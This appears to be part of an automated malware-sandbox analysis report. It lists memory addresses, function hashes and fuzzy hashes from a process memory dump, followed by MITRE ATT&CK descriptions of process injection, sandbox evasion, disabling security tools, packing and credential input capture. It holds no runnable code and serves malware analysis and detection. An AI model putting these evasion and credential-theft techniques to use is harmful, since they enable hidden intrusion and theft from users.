0x004194b4
0x004194b8
0x004194ba
0x00000000
0x00000000
0x004194bc
0x004194bd
0x004194c3
0x00000000
0x004194c5
0x004194c5
0x004194c5
0x004194c5
0x00000000
0x004194c3
0x00419466
0x0041946b
0x0041946b
0x0041946d
0x0041946d
0x00419471
0x00419473
0x00000000
0x00000000
0x00419475
0x00419476
0x00419478
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00419478
0x0041946d
0x00419464
0x004194ca
0x004194cf
0x004194cf
0x004194d2
0x004194d5
0x004194d8
0x004194da
0x004194ed
0x004194f0
0x004194f0
0x004194f6
0x004194fe
0x004194fe
0x004194fe
0x004194ff
0x00419509
0x00419510
0x00419511
0x00419514
0x00419519
0x0041951f
0x00419521
0x00419523
0x0041956d
0x0041956f
0x00419525
0x00419525
0x00419527
0x00419529
0x0041952c
0x0041952f
0x00419531
0x00419533
0x00419537
0x00419537
0x00419539
0x00419539
0x0041953a
0x0041953f
0x00419544
0x00419546
0x00000000
0x00000000
0x00419548
0x0041954c
0x00419550
0x00419552
0x00000000
0x00000000
0x00000000
0x00419552
0x00419554
0x00419554
0x00419531
0x00419558
0x0041955a
0x0041955b
0x0041955f
0x00419564
0x00419568
0x00419568
0x00419572
0x00419575
0x00419578
0x004194dc
0x004194dc
0x004194dc
0x0041957a
0x0041957c
0x0041957e
0x00419584
0x00419586
0x0041958c
0x00419596
0x00419596
0x00419599
0x0041959a
0x0041959d
0x0041959f
0x00000000
0x00000000
0x004195a1
0x004195a3
0x00419691
0x00000000
0x00000000
0x00000000
0x00000000
0x004195a9
0x004195a9
0x004195ab
0x00419590
0x00419593
0x00419593
0x00000000
0x00419593
0x00000000
0x004195ab
0x00419596
0x00419586
0x0041957e
0x00419452
0x00419610
0x00419610
0x00419612
0x00419613
0x00419624
0x00419624
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction ID: ede34d42a2a0682563cbd6027a7a6bbcb781230a55be0314351c9d0e0ae8a13f
Opcode Fuzzy Hash: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction Fuzzy Hash: 0D221972A0161246DB244E39C8613B772D3AFD9750B29872FE965CB394FB3DCCC28259

Uniqueness

Uniqueness Score: -1.00%

Function 0041D980, Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction ID: cf916d6f8feb2e022befbc444edd053b885a124b63d79dfad61e464d731f06d0
Opcode Fuzzy Hash: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction Fuzzy Hash: 7522F6B5E046128BD7148F1AC8406ABB7E2BFD4740F19C52EE8568B394EB78DCC1C389

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA10, Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f120657901a49221ee898ec782cb451b884ebe19aa5a6de2e8abf4d838a09dc
Instruction ID: 89a25ef6e08a61223b9dddcb74bdd82c463bb633a349e363a430cdb6536e3cfe
Opcode Fuzzy Hash: 8f120657901a49221ee898ec782cb451b884ebe19aa5a6de2e8abf4d838a09dc
Instruction Fuzzy Hash: 4312EE316043019BD728CF1AD980B6BB7F5AFC4714F588A2EEA8587355E778EC84CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF50, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction ID: 5f9b1e1a947612074385ca33637b35a9f93adf5cd4dc4905efad8ae8cb9aaaff
Opcode Fuzzy Hash: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction Fuzzy Hash: 21120675A443128BC724CF59C8D06BB73E2BFD4710B18862EE8918B395EB39DC81C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA10, Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22ca7d8ea7e3b2918243420e139af8543b60187e8a1372e2ffe24e00a7edec0
Instruction ID: 2d92134b0b07fd48451240ffe47d49a02662359ea3299fa560907be08e3afc8d
Opcode Fuzzy Hash: a22ca7d8ea7e3b2918243420e139af8543b60187e8a1372e2ffe24e00a7edec0
Instruction Fuzzy Hash: F3F1D1717042209BC750AF7AD89262F76E6AFC1358F50062FF556973E2DA38DC05CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F9A0, Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2282de272ffeaa822dc51774d2960a727b4d5dfd25f04bb1f8cff10769ea2d
Instruction ID: 79a7f6e28d03a072a7f2c2a8a77e8211fb28f9ede26ff42f03de21a6485fb470
Opcode Fuzzy Hash: 8a2282de272ffeaa822dc51774d2960a727b4d5dfd25f04bb1f8cff10769ea2d
Instruction Fuzzy Hash: 04F1C3717042245BC720AF26E89266E73E5AFC5358F44093FF55A972D2DB38DC09CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0042D620, Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35d8687a538e8724047cb192ad13f8ce0e701e86c4680d8d2376d217242e050
Instruction ID: 7453775664e064f8153fcc57ccc05cbdfa4f2d94e33794ee124696faaed429ed
Opcode Fuzzy Hash: c35d8687a538e8724047cb192ad13f8ce0e701e86c4680d8d2376d217242e050
Instruction Fuzzy Hash: 67E1E22EF38FD909E313853AA4037B7B7444FF72C8F42E727B49431992DB6956926148

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6E0, Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17bc7887b6ca27b0da700f0c02e91fd535d74f32a0311455d5421e67ce5f7b5
Instruction ID: 9cbd3e7d5df75b2054d6fa195ca70129a74a82b32051c4a292b88db5f6cb9688
Opcode Fuzzy Hash: e17bc7887b6ca27b0da700f0c02e91fd535d74f32a0311455d5421e67ce5f7b5
Instruction Fuzzy Hash: 86C14D71A1471246C7245E29C4506B772E2AFD4750B29C73FD8AA8B394FB3DCCC78249

Uniqueness

Uniqueness Score: -1.00%

Function 00417FC0, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c6a699ea105ed68623de7fd36fbccea19854961123d9d56c1adb2a53a651ba
Instruction ID: 1127fb4b6ff76659369599cecc8a9f7e30743491ed4b44e8ffcf9bb4e91a09d7
Opcode Fuzzy Hash: 98c6a699ea105ed68623de7fd36fbccea19854961123d9d56c1adb2a53a651ba
Instruction Fuzzy Hash: 1FB1BE71905B5256D7268B2988403BBBAD2AFC2700F1DC76FDDA50B395DE398C81C39A

Uniqueness

Uniqueness Score: -1.00%

Function 004183C0, Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af98782080b8c907656887915937f318e2e97d5adae83e3e034cad2c8be9cb8
Instruction ID: 0d6bd11e707f9124965a6e10b60cd06371cedf73e3f451d3029f04592c2cc344
Opcode Fuzzy Hash: 8af98782080b8c907656887915937f318e2e97d5adae83e3e034cad2c8be9cb8
Instruction Fuzzy Hash: 69B169B5A0431286D7284F29C8917BB72D2EF85350F29872FED6657395EF788C80C29D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3F0, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction ID: 9d815f495425917ea3b0258f8955147fe9dbf58989129f70dcd44852c00b2e11
Opcode Fuzzy Hash: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction Fuzzy Hash: 5CC1E5786043028FD714CF1AC4906ABB7E1FF94304F14862EEDA58B391E739D996CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042D180, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eebcffa5d3dec0ee8ee4f633aeb20e6db57f75f5a67056125e00cad1d421f41e
Instruction ID: 5ad78a51d914734b630daafdf643e9b87f8845ae2210fbb57ff51b83d5b63c3f
Opcode Fuzzy Hash: eebcffa5d3dec0ee8ee4f633aeb20e6db57f75f5a67056125e00cad1d421f41e
Instruction Fuzzy Hash: A5D1B23160D3F44AC325AB2AA4507BFFFD15FE6304F58887EA8C553283C5788A45DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00423B00, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction ID: 0c2e19392199d6dd72042ecc932d6cda78447e8adf796c5a788a2e6b19a210c8
Opcode Fuzzy Hash: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction Fuzzy Hash: 0BC1D0746083628BC714CF29E44072BBBF2AF85701F588A1EE9959B351D73CEA45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCA0, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b4b0132f1716d9d330779972ddd039648a5f9bf8c3fecf65c301793a73e151
Instruction ID: a24c8b59b86c2e03d38b3b2f0e1e488e52fba4a6c14aab71c08389eec953bacd
Opcode Fuzzy Hash: c1b4b0132f1716d9d330779972ddd039648a5f9bf8c3fecf65c301793a73e151
Instruction Fuzzy Hash: 8CC1B52170C3A14AC325AB3AA4902BFFFD15FE5204F588D7EE4C987293D578C984D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00429B10, Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction ID: b6b76d099d9f8efb05629ce4c704f893abb9cadf060c0fe02198907a357536ee
Opcode Fuzzy Hash: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction Fuzzy Hash: C6A12471B043169BC700DF1AEC8061AF7A2FFC4304F94CA2EE86847745E779AD918B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417564, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a054765ee94cd00e7a621a7699d80f0f8e9d06abd888a796b3f9df16ee9bc38
Instruction ID: 9bc79f26362b7b61cd41c957d835c3bc61e3e90790b8f676a93dbccdb74ddce6
Opcode Fuzzy Hash: 2a054765ee94cd00e7a621a7699d80f0f8e9d06abd888a796b3f9df16ee9bc38
Instruction Fuzzy Hash: 05A1C170A086059BD7249F19C4847EBB3B2FB94314F28C66FD5498B351EB789CC2C799

Uniqueness

Uniqueness Score: -1.00%

Function 004271F0, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction ID: 5e0b0619e12b177900da564ab70965d54a32da5d106d2096e0b8e91ff134bc76
Opcode Fuzzy Hash: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction Fuzzy Hash: A6B1B070A0C3628FD715CF29E44072ABBE1BFC9304F588A5EE89587351E739D946CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0A0, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction ID: 53430fe4db13304cac5fe3ad8f78fb7864429030ba4384fec63ec01738c236b9
Opcode Fuzzy Hash: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction Fuzzy Hash: 20A1A0B59047128BC724CF1AC54065BB7E2BFC4700F18CA2EECA597354E739DC868796

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDD0, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction ID: b3c95bfcce6a72bb80ed4820981e37eb1a282f907a1b197b90d156a8d9e7100d
Opcode Fuzzy Hash: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction Fuzzy Hash: A08123716043118BD714CF29D44026BB3E2FFD8354F28862FE495973A2EB79D886C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00420220, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction ID: 8675dd8767b05401d337404a97b56bb10e1d18b8c54c0053bc895562c5860b23
Opcode Fuzzy Hash: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction Fuzzy Hash: BB71F87170463287C7288E29D45123B72D2AFD17607A9C32FEE96873A2FA38DC51C259

Uniqueness

Uniqueness Score: -1.00%

Function 00425CB0, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction ID: 634aadee2e335546a6fa2a0945152cb2044dcbd91e1629515a65e33c589c776b
Opcode Fuzzy Hash: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction Fuzzy Hash: C8812570718B518BD718CF29E44032BBBD2AFD5310F59C66EE4968B351DB389941C78A

Uniqueness

Uniqueness Score: -1.00%

Function 004198DA, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f4a753671e447e7c56091af0e00954b60d69af93815d51f29a2bf8f27ccfb4
Instruction ID: 32ba628d2565e318e78a204fd7c9fb83c1a419a9e8e39d961d803790af486d96
Opcode Fuzzy Hash: 62f4a753671e447e7c56091af0e00954b60d69af93815d51f29a2bf8f27ccfb4
Instruction Fuzzy Hash: B3613D71A1076186DB288F29C4716B772E2AFC5780B1CC22FD9564B394FB399CC5835A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0D0, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction ID: 01b691137518108aaa63ea24dca04db856c6c54ed717ac97f1f68da723332baa
Opcode Fuzzy Hash: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction Fuzzy Hash: EF615A7290231187C7248F19C4916AB73A0BF85750F1A436EDD568B390EB7A9CE5C39B

Uniqueness

Uniqueness Score: -1.00%

Function 00419E70, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction ID: 208aeace49a309dc651068884fd916e855e98af0e388485558130185b46d8ff1
Opcode Fuzzy Hash: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction Fuzzy Hash: 6E616E7290131297C7248F19C4A1AAB77A1AF85750B19432FED558B3D0EB399CD2C3DE

Uniqueness

Uniqueness Score: -1.00%

Function 00421020, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction ID: 1195064881bf94f8d051036f199276547e0fa6e3ba8b634740ade5e19295d783
Opcode Fuzzy Hash: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction Fuzzy Hash: 40613F217047A157D725CE69A8C03377AE65FAA300F9CC2AECD514F366DA798C52C3C6

Uniqueness

Uniqueness Score: -1.00%

Function 00421240, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction ID: f78019b16cf843eb2cc5b17e21c17e28bbf2606c0f3335f5425df6285b73c052
Opcode Fuzzy Hash: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction Fuzzy Hash: 65614D357087B147D725CE69A4C032B7AA76FA6300F98C2AFDC554B3A6D63A8C42C2C5

Uniqueness

Uniqueness Score: -1.00%

Function 00418CC0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction ID: c5bff65c851247d975fbba65caee9d7ac7328e09c5ce73680344b93df5248185
Opcode Fuzzy Hash: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction Fuzzy Hash: 18514871A0071286D7248F2AC8816B772A3AFE1350B29C22ED956C7394FF798CD1C24D

Uniqueness

Uniqueness Score: -1.00%

Function 00418AB0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction ID: c3c48329ce64fa7108d2abd3f6ea7e221284a2a8a5b13efb6eff3d0ce9cc7fca
Opcode Fuzzy Hash: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction Fuzzy Hash: C6516AF1A0571246D7284F29C8816B772A2EFD5340B28C23FE99287395FF7D9881C299

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction ID: 85f6ebe59337530197e0b433d896da7c21a99bafb41af6590cb708bc4fb69cc8
Opcode Fuzzy Hash: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction Fuzzy Hash: 42517BF1A1071247C7288F2AC85127772D2AFD5390B2CC23FD9964B395FF398891C24A

Uniqueness

Uniqueness Score: -1.00%

Function 0042CEF8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bcbb5b5ef7f2851748cd5b2890678cd4a4d4b06723daf5d9afcf6aa5ae59ec
Instruction ID: 652e1e55a3db434fad670365145aa2d89441e91d86d451b4491a57d34e56adb6
Opcode Fuzzy Hash: 03bcbb5b5ef7f2851748cd5b2890678cd4a4d4b06723daf5d9afcf6aa5ae59ec
Instruction Fuzzy Hash: 9D419D7170417595DF208E2AAAC07BF26939F61758F964027FE40CA3D0E72ECC82D299

Uniqueness

Uniqueness Score: -1.00%

Function 004196D0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: 312cdaee82629cea535725b8fa5dba086187b9a4b3a3a3798f11524011d7fea7
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: 4F41497292422187C7245F29C8A16A7B391AF95360F15833FEDA6873D0EB398C91C299

Uniqueness

Uniqueness Score: -1.00%

Function 00412980, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0881f73e1039f1e51c2ccf9e8e510ab00d7eb95d137dba1a57e6002b30b95450
Instruction ID: 4c2becf31357de201d9bb2b266d7cd906019457299123c48f48acf346196ef96
Opcode Fuzzy Hash: 0881f73e1039f1e51c2ccf9e8e510ab00d7eb95d137dba1a57e6002b30b95450
Instruction Fuzzy Hash: B141B0302042089BC714FF25CD51BEB3765AF90744F44852EB9068B292EFB9ACD6D79D

Uniqueness

Uniqueness Score: -1.00%

Function 022688FD, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512212900.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction ID: a207fa4dc62dde14d487da59d354a7c649d6a4826a4886ffaa1984fec571dd3a
Opcode Fuzzy Hash: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction Fuzzy Hash: 56012BB680C7D58FC7129F74C84856A3B20AF472347590399E5B12F2E6CB21941BDBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6676955ca65c2f84aa67509ce07fbd9b8277e54a42b2a3c56c39c0b785ae0d3a
Instruction ID: e2e004e176e022003c78da77a70d6f0e6cdc4c1158265898ffa057c803a49b8c
Opcode Fuzzy Hash: 6676955ca65c2f84aa67509ce07fbd9b8277e54a42b2a3c56c39c0b785ae0d3a
Instruction Fuzzy Hash: 88F0E234304522AAEF255A2AAC80BEB33DDDF45394F5A0567B760C52A4FB29CC00859A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

